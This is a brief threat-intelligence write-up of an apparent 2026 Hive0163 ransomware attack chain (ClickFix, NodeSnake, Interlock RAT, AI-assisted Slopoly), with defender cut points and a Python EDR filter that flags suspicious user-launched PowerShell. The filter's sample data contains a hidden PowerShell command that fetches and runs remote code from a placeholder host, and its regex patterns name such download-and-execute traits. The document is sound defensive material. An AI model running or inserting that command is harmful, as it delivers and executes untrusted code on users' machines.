The financially motivated threat actor Hive0163 utilized AI-assisted Slopoly malware in a ransomware attack observed in early 2026. The attack began with a ClickFix social engineering tactic, leading to the deployment of NodeSnake, then Interlock RAT, and finally Slopoly, which maintained persistent access for over a week, enabling data exfiltration and ransomware deployment.
Initial Access
ClickFix Social Engineering
confirmed
Threat actor Hive0163 used the 'ClickFix' social engineering tactic to trick a victim into running a PowerShell command, initiating the attack chain.
Defender cut points
User awareness training on social engineering tactics
Email filtering and web proxies to block malicious links
Endpoint detection and response (EDR) to flag suspicious user-initiated command execution
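The EDR cut point above, as an added example (not from the original report or from any vendor's product): a Python filter over process-creation records that flags PowerShell started directly from the desktop shell with risky arguments. The record fields follow Sysmon Event ID 1; the trait patterns, the two-trait threshold, the function names and the sample events are assumptions constructed for illustration.

```python
import re

PS_HOSTS = {"powershell.exe", "pwsh.exe"}

# Assumed command-line heuristics; tune them against your own telemetry.
TRAITS = {
    "hidden_window": re.compile(r"(?i)(?:^|\s)-w\w*\s+(?:hidden|1)\b"),
    "encoded_command": re.compile(r"(?i)(?:^|\s)-e\w*\s+[A-Za-z0-9+/=]{16,}"),
    "remote_fetch": re.compile(
        r"(?i)\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring)\b"),
    "inline_exec": re.compile(r"(?i)\b(?:iex|invoke-expression)\b"),
}

# Constructed process-creation records (field names follow Sysmon Event ID 1).
SAMPLE_EVENTS = [
    {"User": "CORP\\alice", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe"},
    {"User": "CORP\\bob", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell.exe -w hidden -c "iex (irm https://example.invalid/a)"'},
    {"User": "NT AUTHORITY\\SYSTEM", "ParentImage": r"C:\Windows\System32\svchost.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1"},
    {"User": "CORP\\carol", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "CommandLine": r"pwsh.exe -ExecutionPolicy RemoteSigned -File C:\Users\carol\build.ps1"},
]

def basename(path):
    """Lower-cased file name of a Windows or POSIX style path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def flag_user_launched_powershell(events, min_traits=2):
    """Return (event, traits) for PowerShell spawned by explorer.exe with >= min_traits."""
    hits = []
    for ev in events:
        if basename(ev["Image"]) not in PS_HOSTS:
            continue
        if basename(ev["ParentImage"]) != "explorer.exe":
            continue  # not started from the interactive desktop shell
        traits = sorted(n for n, rx in TRAITS.items() if rx.search(ev["CommandLine"]))
        if len(traits) >= min_traits:
            hits.append((ev, traits))
    return hits

if __name__ == "__main__":
    for ev, traits in flag_user_launched_powershell(SAMPLE_EVENTS):
        print(ev["User"], traits, ev["CommandLine"])
```

Requiring two traits keeps a plain interactive PowerShell window or a signed script launch from alerting, at the cost of missing single-trait commands.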